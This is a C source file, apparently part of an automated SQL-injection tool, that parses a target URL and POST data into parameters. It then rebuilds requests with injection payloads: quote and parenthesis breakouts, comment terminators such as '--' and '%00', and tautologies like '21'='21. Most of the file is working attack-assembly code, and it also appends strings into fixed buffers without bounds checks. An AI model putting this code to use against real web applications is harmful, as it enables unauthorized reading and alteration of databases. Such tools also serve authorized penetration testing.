/*
 * <crack.c>
 */

#include "sqlibf.h"


//
// CRACK_URL __________________________________________________________________
//
// Uso: Parsea la URL y la separa en sus componentes
//

struct cracked_url crack_url(char *url, char *post) {
  char *ptr;
  char *ptr_igual;
  char *ptr_and;
  char *fin;
  struct cracked_url cracked;
  struct query_string *ptr_param;
  int param_count=0;


  if(options.debuging>4) IMPRIME("++++ crack_url() CRACKING URL\nURL = %s\nPOST = %s\n", url, post);


  // Base

  // OJO: Considerar si interesa terminar al encontrar '#' en la url

  fin=url+strlen(url);

  ptr=strchr(url, '#');


  if(ptr) fin=ptr;

  ptr=strchr(url, '?');

  if(options.debuging>5) IMPRIME("+++++ crack_url() PTR = %p\n", ptr);

  if(ptr) {
    cracked.base=malloc(ptr-url+1); memset(cracked.base, 0, ptr-url+1);
    strncpy(cracked.base, url, ptr-url);
    if(options.debuging>1) IMPRIME("+ crack_url() BASE = %s\n", cracked.base);
    ptr=ptr+1;
    } else {
    ptr=fin;
    cracked.base=malloc(ptr-url+1); memset(cracked.base, 0, ptr-url+1);
    strncpy(cracked.base, url, ptr-url);
    if(options.debuging>1) IMPRIME("+ crack_url() BASE = %s\n", cracked.base);
  }


  // Query_string

  cracked.url_params=malloc(sizeof(struct query_string)); memset(cracked.url_params, 0, sizeof(struct query_string));
  ptr_param=cracked.url_params;


  while(ptr<fin) {
    if(options.debuging>5) IMPRIME("+++++ crack_url() BUCLE()\n");
    ptr_igual=strchr(ptr, '=');
    ptr_and=strchr(ptr, *SEPARATOR);

    if(!ptr_and) ptr_and=fin;

    if(!ptr_igual) ptr_igual=ptr_and;

    if(ptr_and<=ptr_igual) {
      ptr_param->valor=malloc(ptr_and-ptr+1); memset(ptr_param->valor, 0, ptr_and-ptr+1);
      ptr_param->variable=0;
      strncpy(ptr_param->valor, ptr, ptr_and-ptr);
      if(options.debuging>1) IMPRIME("+ crack_url() VARIABLE = (null)\n");
      if(options.debuging>1) IMPRIME("+ crack_url() VALOR = %s\n", ptr_param->valor);
      ptr_param->siguiente=malloc(sizeof(struct query_string)); memset(ptr_param->siguiente, 0, sizeof(struct query_string));
      ptr_param=ptr_param->siguiente;
      param_count++;
    }

    if(ptr_igual<ptr_and) {
      ptr_param->variable=malloc(ptr_igual-ptr+1); memset(ptr_param->variable, 0, ptr_igual-ptr+1);
      ptr_param->valor=malloc(ptr_and-ptr_igual); memset(ptr_param->valor, 0, ptr_and-ptr_igual);
      strncpy(ptr_param->variable, ptr, ptr_igual-ptr);
      strncpy(ptr_param->valor, ptr_igual+1, ptr_and-ptr_igual-1);
      if(options.debuging>1) IMPRIME("+ crack_url() VARIABLE = %s\n", ptr_param->variable);
      if(options.debuging>1) IMPRIME("+ crack_url() VALOR = %s\n", ptr_param->valor);
      ptr_param->siguiente=malloc(sizeof(struct query_string)); memset(ptr_param->siguiente, 0, sizeof(struct query_string));
      ptr_param=ptr_param->siguiente;
      param_count++;
    }

    ptr=ptr_and+1;

  }


  // Post

  ptr=post;
  fin=post+strlen(post);

  cracked.post_params=malloc(sizeof(struct query_string)); memset(cracked.post_params, 0, sizeof(struct query_string));
  ptr_param=cracked.post_params;


  while(ptr<fin) {
    if(options.debuging>5) IMPRIME("+++++ crack_url() POST_BUCLE()\n");
    ptr_igual=strchr(ptr, '=');
    ptr_and=strchr(ptr, *SEPARATOR);

    if(!ptr_and) ptr_and=fin;

    if(!ptr_igual) ptr_igual=ptr_and;

    if(ptr_and<=ptr_igual) {
      ptr_param->valor=malloc(ptr_and-ptr+1); memset(ptr_param->valor, 0, ptr_and-ptr+1);
      ptr_param->variable=0;
      strncpy(ptr_param->valor, ptr, ptr_and-ptr);
      if(options.debuging>1) IMPRIME("+ crack_url() POST_VARIABLE = (null)\n");
      if(options.debuging>1) IMPRIME("+ crack_url() POST_VALOR = %s\n", ptr_param->valor);
      ptr_param->siguiente=malloc(sizeof(struct query_string)); memset(ptr_param->siguiente, 0, sizeof(struct query_string));
      ptr_param=ptr_param->siguiente;
      param_count++;
    }

    if(ptr_igual<ptr_and) {
      ptr_param->variable=malloc(ptr_igual-ptr+1); memset(ptr_param->variable, 0, ptr_igual-ptr+1);
      ptr_param->valor=malloc(ptr_and-ptr_igual); memset(ptr_param->valor, 0, ptr_and-ptr_igual);
      strncpy(ptr_param->variable, ptr, ptr_igual-ptr);
      strncpy(ptr_param->valor, ptr_igual+1, ptr_and-ptr_igual-1);
      if(options.debuging>1) IMPRIME("+ crack_url() POST_VARIABLE = %s\n", ptr_param->variable);
      if(options.debuging>1) IMPRIME("+ crack_url() POST_VALOR = %s\n", ptr_param->valor);
      ptr_param->siguiente=malloc(sizeof(struct query_string)); memset(ptr_param->siguiente, 0, sizeof(struct query_string));
      ptr_param=ptr_param->siguiente;
      param_count++;
    }

    ptr=ptr_and+1;

  }


  // Fin

  cracked.param_num=param_count;

  if(options.debuging>5) IMPRIME("+++++ crack_url() PARAM_COUNT = %d\n", param_count);

  return cracked;

}


//
// ASSEMBLE_URL ________________________________________________________________
//
// Uso: Une los componentes de la URL (incluidos posibles valores inyectados)
//

struct assembled_url assemble_url(struct cracked_url cu, int num, char *append) {
  char *url;
  char *post;
  struct query_string *ptr_param;
  int counter=1;
  struct assembled_url assembled;

  url=malloc(STRING_SIZE); memset(url, 0, STRING_SIZE);
  post=malloc(STRING_SIZE); memset(post, 0, STRING_SIZE);

  if(num>cu.param_num) num=cu.param_num;


  // Url

  ptr_param=cu.url_params;

  strncpy(url, cu.base, strlen(cu.base));
  if(ptr_param->siguiente!=0) strncat(url, "?", 1);

  while(ptr_param->siguiente!=0 && counter<=cu.param_num) {
    if(ptr_param->variable!=0) {
      strncat(url, ptr_param->variable, strlen(ptr_param->variable));
      strncat(url, "=", 1);
    }

    strncat(url, ptr_param->valor, strlen(ptr_param->valor));

    if(counter==num) {

      if(doing_union==1) strcat(url, "21");

      if(ptr_param->is_injectable==SINGLE_QUOTE || ptr_param->is_injectable==STRING_CONCAT_PIPE || ptr_param->is_injectable==STRING_CONCAT_PLUS) strcat(url, uri_encode("'"));
      if(ptr_param->is_injectable==DOUBLE_QUOTES) strcat(url, uri_encode("\""));

      if(ptr_param->parentesis==1) strcat(url, uri_encode(")"));
      if(ptr_param->parentesis==2) strcat(url, uri_encode("))"));

      strcat(url, uri_encode(append));

      switch(ptr_param->terminator) {
        case GG: strcat(url, uri_encode("--")); break;
        case BA: strcat(url, uri_encode("/*")); break;
        case PC: strcat(url, uri_encode(";")); break;
        case NL: strcat(url, uri_encode("%00")); break;   // '\0'
        case HA: strcat(url, uri_encode("#")); break;
        case P1: strcat(url, uri_encode(")--")); break;
        case P2: strcat(url, uri_encode("))--")); break;
        case FINGER:
          if(ptr_param->is_injectable==UNESCAPED) strcat(url, uri_encode("21=21"));
          if(ptr_param->is_injectable==SINGLE_QUOTE) strcat(url, uri_encode("'21'='21"));
          if(ptr_param->is_injectable==DOUBLE_QUOTES) strcat(url, uri_encode("\"21\"=\"21"));
          break;
      }

    }

    if(ptr_param->siguiente->siguiente!=0) strncat(url, SEPARATOR, 1);
    ptr_param=ptr_param->siguiente;
    counter++;

  }


  // Post

  ptr_param=cu.post_params;

  while(ptr_param->siguiente!=0 && counter<=cu.param_num) {
    if(ptr_param->variable!=0) {
      strncat(post, ptr_param->variable, strlen(ptr_param->variable));
      strncat(post, "=", 1);
    }

    strncat(post, ptr_param->valor, strlen(ptr_param->valor));

    if(counter==num) {

      if(doing_union==1) strcat(post, "21");

      if(ptr_param->is_injectable==SINGLE_QUOTE || ptr_param->is_injectable==STRING_CONCAT_PIPE || ptr_param->is_injectable==STRING_CONCAT_PLUS) strcat(post, uri_encode("'"));
      if(ptr_param->is_injectable==DOUBLE_QUOTES) strcat(post, uri_encode("\""));

      if(ptr_param->parentesis==1) strcat(post, uri_encode(")"));
      if(ptr_param->parentesis==2) strcat(post, uri_encode("))"));

      strcat(post, uri_encode(append));

      switch(ptr_param->terminator) {
        case GG: strcat(post, uri_encode("--")); break;
        case BA: strcat(post, uri_encode("/*")); break;
        case PC: strcat(post, uri_encode(";")); break;
        case NL: strcat(post, uri_encode("%00")); break;   // '\0'
        case HA: strcat(post, uri_encode("#")); break;
        case P1: strcat(post, uri_encode(")--")); break;
        case P2: strcat(post, uri_encode("))--")); break;
        case FINGER:
          if(ptr_param->is_injectable==UNESCAPED) strcat(post, uri_encode("21=21"));
          if(ptr_param->is_injectable==SINGLE_QUOTE) strcat(post, uri_encode("'21'='21"));
          if(ptr_param->is_injectable==DOUBLE_QUOTES) strcat(post, uri_encode("\"21\"=\"21"));
          break;
      }

    }

    if(ptr_param->siguiente->siguiente!=0) strncat(post, SEPARATOR, 1);
    ptr_param=ptr_param->siguiente;
    counter++;
  }


  // Fin

  assembled.url = url;
  assembled.post = post;
  return assembled;

}


//
// VARIABLE_NAME ________________________________________________________________
//
// Uso: Obtiene el nombre de la variable segun su posicion en la URL
//

char *variable_name(struct cracked_url cu, int num) {
  struct query_string *ptr_param;
  int counter=1;


  if(num>cu.param_num) num=cu.param_num;


  // Url

  ptr_param=cu.url_params;

  while(ptr_param->siguiente!=0 && counter<=cu.param_num) {
    if(counter==num && ptr_param->variable!=0) return ptr_param->variable;
    ptr_param=ptr_param->siguiente;
    counter++;
  }

  // Post

  ptr_param=cu.post_params;

  while(ptr_param->siguiente!=0 && counter<=cu.param_num) {
    if(counter==num && ptr_param->variable!=0) return ptr_param->variable;
    ptr_param=ptr_param->siguiente;
    counter++;
  }

  return "noname";

}

